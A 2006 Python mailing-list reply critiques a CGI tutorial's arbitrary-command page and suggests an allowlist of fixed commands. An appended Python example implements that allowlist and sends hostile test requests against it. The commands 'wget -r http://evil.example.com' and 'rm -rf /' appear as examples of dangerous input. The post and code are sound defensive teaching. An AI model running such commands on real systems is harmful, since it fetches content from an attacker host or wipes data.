CGI Tutorial
Tim Chase
python.list at tim.thechases.com
Wed Oct 4 16:24:18 EDT 2006
>> I'm just building a Python CGI Tutorial and would appreciate any
>> feedback from the many experts in this list.
>
> http://webpython.codepoint.net
Thanks! :)

My first note would be regarding

http://webpython.codepoint.net/shell_commands

The code is very dangerous...allowing any ol' schmoe to run
arbitrary code on your server. At the barest of minimums, I'd
plaster the code with warnings that this is a Very Dangerous
Thing(tm) to do. Preferably, one would want to have fixed sets
of commands, something like

    install_django = 'curl...'
    if command=='install_django': sub.Popen(install_django, ...)

so that only trusted code is run, not arbitrary things like

    'wget -r http://evil.example.com'

or

    'rm -rf /'

which would just be bad.

Similarly, regarding

http://webpython.codepoint.net/debugging

you might want to caution that this will/can display potentially
sensitive information (passwords, internal file-structure, etc),
and thus should only be used while debugging, and turned off in
any sort of production code.

The section on single vs. multiple field names was pretty good at
giving a nice overview that there are *two* scenarios one might
encounter.

Just a little feedback, whether from an expert or otherwise. :)

-tkc
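
The fixed-command approach suggested in the message above, as an added example that is not part of the original post or of the tutorial it reviews. The command names and argv lists in ALLOWED_COMMANDS are made up for illustration; the request value only selects an entry and never reaches a command line.

```python
import subprocess
import sys
from urllib.parse import parse_qs

# Hypothetical allowlist: each request-visible name maps to a fixed argv list.
# Request data only selects an entry; it never becomes part of a command line.
ALLOWED_COMMANDS = {
    "python_version": [sys.executable, "--version"],
    "hello": [sys.executable, "-c", "print('hello from a fixed command')"],
}


def run_allowed(name, timeout=10):
    """Run the fixed command registered under `name`; return (returncode, output)."""
    if not isinstance(name, str) or name not in ALLOWED_COMMANDS:
        raise KeyError("command not in allowlist")
    proc = subprocess.run(
        ALLOWED_COMMANDS[name],
        shell=False,               # argv list is executed directly, no shell parsing
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,  # merge stderr so the caller sees one stream
        text=True,
        timeout=timeout,           # a hung command cannot hold the CGI process forever
    )
    return proc.returncode, proc.stdout


def handle(query_string):
    """Map a CGI query string to (status, body) without echoing internals."""
    values = parse_qs(query_string).get("command", [])
    if len(values) != 1:           # missing or repeated field: refuse, do not guess
        return "400 Bad Request", "exactly one 'command' field is required\n"
    try:
        returncode, output = run_allowed(values[0])
    except KeyError:
        return "403 Forbidden", "unknown command\n"
    except subprocess.TimeoutExpired:
        return "504 Gateway Timeout", "command timed out\n"
    return ("200 OK" if returncode == 0 else "500 Internal Server Error"), output


if __name__ == "__main__":
    # Constructed sample requests, including one string quoted in the post.
    for qs in ("command=python_version", "command=rm+-rf+/", "command=hello&command=hello"):
        status, body = handle(qs)
        print(qs, "->", status, body.strip())
```

The error bodies are deliberately terse, which also covers the debugging point in the message: tracebacks and paths stay in the server log rather than in the response.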